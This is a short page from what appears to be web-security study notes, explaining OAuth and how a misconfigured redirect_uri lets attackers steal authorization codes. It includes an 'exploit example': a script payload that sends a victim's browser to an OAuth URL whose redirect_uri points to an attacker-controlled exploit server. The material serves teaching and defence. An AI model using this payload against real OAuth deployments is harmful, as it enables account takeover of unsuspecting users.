OAuth

OAuth is a commonly used authorization framework that enables websites and web applications to request limited access to a user's account on another application. Crucially, OAuth allows the user to grant this access without exposing their login credentials to the requesting application. This means users can fine-tune which data they want to share rather than having to hand over full control of their account to a third party.

Redirect URI

The redirect_uri is crucial for security in OAuth and OpenID implementations, as it directs where sensitive data, like authorization codes, are sent post-authorization. If misconfigured, it could allow attackers to redirect these requests to malicious servers, enabling account takeover.

Exploit example, we redirect a user to our exploit server:

<script>
location="https://oauth-server.net/auth?client_id=e952oznwwqeok31q0uwpp&redirect_uri=https://you.exploit-server.net/exploit&response_type=code&scope=openid%20profile%20email"
</script>

PreviousFile upload NextJWT

Last updated 1 month ago